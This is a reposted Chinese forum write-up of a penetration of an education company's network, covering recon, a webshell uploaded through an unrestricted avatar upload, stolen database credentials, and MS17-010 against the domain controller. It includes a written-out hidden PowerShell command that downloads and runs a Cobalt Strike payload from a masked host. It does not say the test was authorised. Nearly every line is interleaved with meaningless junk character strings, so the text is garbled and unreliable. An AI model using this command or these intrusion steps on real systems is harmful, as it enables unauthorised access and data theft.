|
+ g' c1 A2 V7 R
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
( X# n0 M8 Q' }2 z. y1 s% ]
! r0 A- D! \8 w% {% w Y2 R
# W& O9 G: f$ b+ a3 x * O6 }! t) m* N1 P( Q( D
: E: ^8 g7 _7 ^8 ^ {1 y( u4 g( ]1 g& W7 x4 B
正文7 I& w$ N" D1 @+ c1 X
+ N, ~# x2 X! O0 n
6 P' u2 I6 ~+ U+ u: l! b% u4 E( {/ ? ! G7 i8 V' D! H$ x
) z8 u8 F- u: x: O! D; _; D) M$ m4 w
: Q, y! N' p d/ \5 b' O 目标:www.xxxx.com(一家教育机构) + e* e# H- s) K4 E; c' z
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
# b" D$ m/ X8 e- U) j9 G% e4 _
3 _4 t' X/ X7 o* Q' D6 V/ X& `# b( X* Z0 ~4 f. Y: z/ }
3 l5 {# Z* _ _) k2 H$ D8 d) d
. C( \$ B1 {" ]8 `; z V7 H2 U# x }2 w) ?: S
进行了简单的信息搜集 7 d' H9 M6 L) x5 I
( c2 u& ]6 y v- R3 W0 \0 z
% R% E+ m) r1 N6 ~4 S
2 b$ K; _ n$ q: |4 |4 [# w
2 H2 {* P' k4 g, P3 V4 B7 }
子域名搜集 B5 {( o3 ]0 g7 l8 Y$ h2 q
0 h i, }* x! K0 f! a$ J
. Q* v3 c r3 O4 C. u: t ; k) a. ?8 a8 `7 M
5 k# j) {2 |. g, J( x. C, ]% |; I, F
+ {3 T, ]" |& B fofa找资产
: d3 B* G+ @0 q; `; G5 C
$ G1 k5 l9 ?3 a5 [3 t# {" o" e- T2 h$ T. j: r
8 F) r. W: m; r
6 p' W2 u! F6 _, X( v
* w7 J, @" o* C5 U! a) u4 ^" X5 J! X
5 l4 a& j9 _/ Z! S( ~: j+ k$ e: `- Z7 l' }( } c+ s+ F
一共七个资产。去重之后只有两个。 ) s2 _4 ?- s/ S
' y, ~1 K5 {( h& g v+ j, X
0 d8 |% \* i- I6 t0 X3 f' t
4 \6 N( j/ P0 a. [3 K6 W" h
* l2 p( Y5 o- g" @& A" L) B" T+ N& ` 目录探测7 s" B5 T% ]* P( m. N1 T, b" b& G
2 M$ N. g. J- \: Q" A% ^
/ E7 X, x3 D$ [ # T' D/ k6 x( v+ o8 S9 V) z1 q
" j, k9 y2 h* }/ E+ O/ s
0 y: t0 K1 P& b 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
+ P6 ?. h, h9 x) w! P3 O3 G
1 O1 d J8 {' f. x2 z, s) \3 O
6 N o/ H( v0 _5 X' D5 d7 c9 o: M1 Y
1 D7 s' a: D# L! I4 V9 C. ]
9 q. D* `9 S/ v 我又尝试了通过修改返回包来绕过登录界面
$ {$ t, N- t7 S# b+ d6 n . Z) T7 \ `& _" j; }" k
& ~- F! J+ a% @( ^; L( ]
: F/ O9 U4 r% [ ' T9 P5 L& | T/ t* j3 t/ ?
( B4 U# F ^3 @* S1 Z' T8 D+ a/ X- P
还是不行,尝试注入无果# l& n' R6 d" D) o% X
1 S' e$ C$ J2 [: ^4 q, g+ y% V: g9 M" _; x) ]9 R Z P1 b
/ N6 x q) Q4 t: l1 y 4 N& U. o4 i M2 Y
! U& f/ _8 k( o8 R/ h
不过我目录探测出了一处Spring信息泄露
& v* e0 A; a% Y' e! @* w ) u! ]3 _- u; T& T7 T7 y8 r
9 R, H, }( y& `# t8 O3 X! g2 y
/ g V' r6 {* k3 f7 [* z% W' J9 X% @. o# F# H4 a$ {1 {% E- }
8 s; X; h/ r) m9 }' k
% o5 i0 f7 G. G
/ c% _ ~! B( h7 { 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
8 x( T- ~6 ]3 T: a0 k e% Z x, [; ~6 t4 D+ G1 V4 @
- S! |0 c b5 p+ H) s1 `
; V( o+ H" M" q4 @; z4 M
* p2 d3 @$ z" \: b% e' g- A$ O* D: d; V) C/ W2 `3 ~
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。8 E, B+ @+ r# X. s
! {( ]4 u9 i: T' D/ a; x; R0 E$ G1 e7 V
0 v1 C+ l5 F3 _" Z' m. }: } 8 Z( y3 E, j: f. z- q
* [8 m& z; d* l" ]
获取有些师傅到这一步就手机抓包电脑测了。
# d; T8 r% x: m; {/ i3 d6 K 6 a, l- }& U6 |2 C* F$ Y, T1 @& A- C
2 S5 o h# X" n: A
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
+ C# X7 t( B! Y* ]
9 D0 F# t) [# {: W
4 [' D6 O% W. c2 e' C* D2 I 其中在一个公众号发现了小程序,可以进行注册。
9 T! k, e8 L" J: g) U9 k + d' a# |6 x9 f1 I$ [
/ T8 `1 Q0 w" N# ?% Y 看到了头像上传,尝试上传获取WebShell
$ e! h3 K# v% l 1 b" z) `: |4 L, p0 U* N
8 D8 Y( L/ |: S0 u8 M/ b
8 I& V5 J! p5 V8 M
, p& `# k0 W+ A% k
7 i8 e) \" o! E2 { 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问$ \% a# b# ?/ O: w
$ y- Z: Q- a6 z
8 p. D3 Y C3 a" q! V# {
1 w) K1 N* v, E4 R9 P. Z
7 c/ @, F6 J. g* c: ] F3 z; f) w& u9 J% F! f2 C j
然后上了大马5 {! @6 E' c" ~/ D: J! ?2 I' E- }
8 X {8 P, y5 g* _; R5 K1 d" w+ T) K/ i) f
8 c1 l/ s) H: B
4 Y* {: L/ \4 a$ p: a9 T6 a' i: e5 l( h
7 ]- m# e& E& f; Z; W 8 K! p: S7 s6 C! o: j7 e
" x$ H! Z) d5 X& y 通过翻找文件发现数据库账号密码
- C% p1 r7 v; P4 z. P# J9 e4 X6 _2 ` ' c, I$ E# V1 l5 Q- O& ?
- J; G! S! u9 ~' \; c% \
1 M l" h4 I7 M4 A7 ^ 7 l( O+ Z" j* g9 P4 K% c. i' Z
" E; `1 T% O4 W+ V1 h+ J --内网渗透$ b" C: r: X2 Y: Z1 ^2 Z. x
2 X7 D/ W8 F& i7 U
( a9 u7 O! [( l; R 直接通过powershell执行 cs上线
2 D4 e: ]# T0 h* q
& U& m( ^& y5 [- Z! T9 D
# v5 G' k4 H$ d* k* t! B powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
) L+ e& w" S ~/ G9 Z
! e' j4 u l! y$ p. a3 V f, R- {6 [' {
6 y) C3 }2 p: `' |: E- L $ D2 c$ @. p0 _! |; S9 d
* O) z+ l" t# C- p
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
P# B! T p' m1 u
9 A1 T% n" h$ z! D4 }# I$ N+ i4 {! u/ y, c4 Z
6 Q6 g3 T2 P7 s3 x- ^
( H8 v! i- m. j6 o5 z) @" x+ z6 Q* y$ K2 L$ p
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
. h u$ O* ?& Z E % w( e( y/ @, Q
1 [' P& R4 H. i2 z# |0 S/ ]. l( K7 {5 x2 ^7 h
: N" G/ J1 c- m- r! S$ F+ N; V
6 G0 G& `* G5 y& H9 H
# q' J# q' I- K5 P
! B8 r8 s8 B B0 T6 D) R; [6 l8 m+ N* ^9 Q* y+ ~1 n
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
5 ~9 k, r" |+ K* r : F$ r w( c7 u( F9 q; B
; G5 T# P3 d- S* I) L
, Z1 [3 H& D0 ^: N6 K
$ H. w' Q, \8 d' [3 N6 G5 |3 \
2 R" [; }5 |2 E9 X! _7 E ( i, y! ]/ E9 I4 T8 F
) Y+ E( {0 t& n
0 M9 I+ ]) ]: ?4 |& ~4 [5 t! U 3 N7 J; J! i, b. u- C! @
_4 |' s j% N ~" m( r( D- f2 C
( c0 e/ P7 U3 M' e( M" r( {% [1 u. a% t2 P5 Z! U; E- }+ d5 R
+ R% l) }% z, j4 b2 G
' |2 n. F8 N* G: k8 ~! @/ K8 Z( Z/ D
小结
( ` C2 `& N3 s. W5 ~, @# h: p6 U# S
7 N) Y; t; N. d7 L; y8 M2 ?
7 X9 }8 Z, h# Q/ S
# \: o! m% w. l: x7 ^$ t * ~3 @' W! ]7 M: k. W7 C) `8 u( p
- `7 j: N7 `0 ~6 [
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
. A. C0 \$ ~' ?$ A7 p- [
: t v: x: q- A3 H* r) }( p1 y& d, R6 z# n/ D5 A" G
8 C, e4 P4 E$ n# M, J
7 K X. T' V" |4 Q0 p; N. K9 R" ]
; @6 k8 z6 T0 s' ~$ ^* c& J - " e3 D& F9 h% P4 n/ F7 `" ^9 f
5 Y7 L0 P2 M( c* a4 v
9 Y1 u, A k! ?# W, [: ?( n, D0 T
- ( f8 c9 p5 X7 L$ i' |+ V) [8 F
! C- z% G5 | n3 x
/ q2 X9 d' {8 W$ S8 p4 ~1 B4 @ ' L1 q" s. u5 K- ~5 Z
, E! R2 m8 h5 ]; o g5 `/ h
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html- c, f; B+ A% {2 Y( o
, t: \/ J$ J# m6 V/ U. f
3 Y, h6 E/ p) E, J5 J 2 _/ }* x/ Q. T
|